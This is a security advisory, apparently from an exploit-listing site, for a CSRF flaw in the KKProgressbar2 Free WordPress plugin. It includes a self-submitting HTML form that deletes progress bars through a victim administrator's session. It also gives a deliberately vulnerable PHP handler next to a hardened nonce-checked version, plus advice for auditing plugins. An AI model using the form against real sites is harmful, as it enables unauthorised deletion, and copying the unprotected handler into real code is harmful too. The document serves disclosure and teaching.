wpexploit | Bob Matyas | WPEX-ID: D4980886-DA10-4BBC-A84A-FE071AB3B755
History: May 06, 2024 - 12:00 a.m.

KKProgressbar2 Free <= 1.1.4.2 - Progress Bar Deletion via CSRF

Published: 2024-05-06 00:00:00
Author: Bob Matyas
Tags: kkprogressbar2 free, csrf exploit, may 20 2024, progress bar deletion

AI Score: 6.7 Medium (Confidence: Low)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description

The plugin does not perform CSRF checks in some of its admin actions. In particular, the progress bar deletion handler on the `kkpb-menu` admin page accepts a POST with `action=delete-project` and an `id` parameter without verifying a WordPress nonce, so an attacker who can get a logged-in administrator to visit a page they control can delete arbitrary progress bars on the victim's site.

Proof of concept: make a logged-in administrator open an HTML page containing the following (where `<<ID>>` is the ID of an existing progress bar). The form submits itself on load; the victim's browser attaches the wp-admin session cookie to the cross-site POST, and because no nonce is required the deletion goes through:

```
<!-- Attacker-hosted page. The victim's browser sends the wp-admin session cookie with the
     cross-site POST; the plugin checks no nonce, so the request is treated as a real click. -->
<body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
        <!-- The two parameters the vulnerable handler acts on -->
        <input type="hidden" name="action" value="delete-project">
        <input type="hidden" name="id" value="<<ID>>">
    </form>
</body>
```
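The fix on the plugin side is the standard WordPress pattern: tie the state-changing request to a nonce issued to the current user and check the user's capability before acting. The following is an added illustration and is not KKProgressbar2's own code; it reconstructs a hypothetical handler for the `delete-project` action shown in the PoC, first in the unprotected shape the advisory describes and then hardened. The function names (`kkpb_handle_delete_*`, `kkpb_delete_project`, `kkpb_render_delete_form`), the nonce action string `kkpb_delete_project_<id>`, the `manage_options` capability and the text domain are all assumptions; only `page=kkpb-menu`, `action=delete-project` and `id` come from the advisory.

```php
<?php
// Added example, not the plugin's real code. Helper and nonce-action names are assumptions.

// VULNERABLE (hypothetical reconstruction): any POST that reaches the admin page is trusted.
// The session cookie is attached automatically by the browser, so a form auto-submitted
// from an attacker's site is indistinguishable from an admin clicking "Delete".
function kkpb_handle_delete_vulnerable() {
    if ( isset( $_POST['action'] ) && 'delete-project' === $_POST['action'] ) {
        $id = intval( $_POST['id'] );
        kkpb_delete_project( $id ); // assumed helper that removes the progress bar row
    }
}

// HARDENED: same handler with the two checks WordPress expects on a state-changing admin action.
function kkpb_handle_delete_hardened() {
    if ( ! isset( $_POST['action'] ) || 'delete-project' !== $_POST['action'] ) {
        return;
    }
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $id ) {
        return;
    }

    // 1. Authorisation: a nonce proves the request came from this user's own UI, not that the
    //    user is allowed to delete. Check the capability explicitly (assumed: manage_options).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'kkprogressbar2' ), '', array( 'response' => 403 ) );
    }

    // 2. CSRF: check_admin_referer() verifies $_POST['_wpnonce'] against the nonce action for
    //    this user and this exact id, and terminates with a 403 page if it is absent or invalid.
    //    An attacker's page cannot read the nonce from wp-admin (same-origin policy), so the
    //    PoC form above no longer passes this check.
    check_admin_referer( 'kkpb_delete_project_' . $id );

    kkpb_delete_project( $id );
}

// The legitimate delete form must embed the matching nonce so the hardened handler accepts it.
function kkpb_render_delete_form( $id ) {
    $id = absint( $id );
    ?>
    <form action="<?php echo esc_url( admin_url( 'admin.php?page=kkpb-menu' ) ); ?>" method="post">
        <?php wp_nonce_field( 'kkpb_delete_project_' . $id ); ?>
        <input type="hidden" name="action" value="delete-project">
        <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>">
        <button type="submit" class="button button-secondary">Delete</button>
    </form>
    <?php
}
```

Binding the `id` into the nonce action means a nonce leaked for one progress bar cannot be replayed to delete another, and keeping the capability check separate from the nonce check matters because WordPress nonces are per-user, not per-role: a low-privileged user who can reach a page that emits the nonce would otherwise satisfy the CSRF check on their own. When auditing a plugin for this class of bug, look for every `$_POST`/`$_GET` action branch in admin page callbacks and confirm each one calls `check_admin_referer()` or `wp_verify_nonce()` before touching the database.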
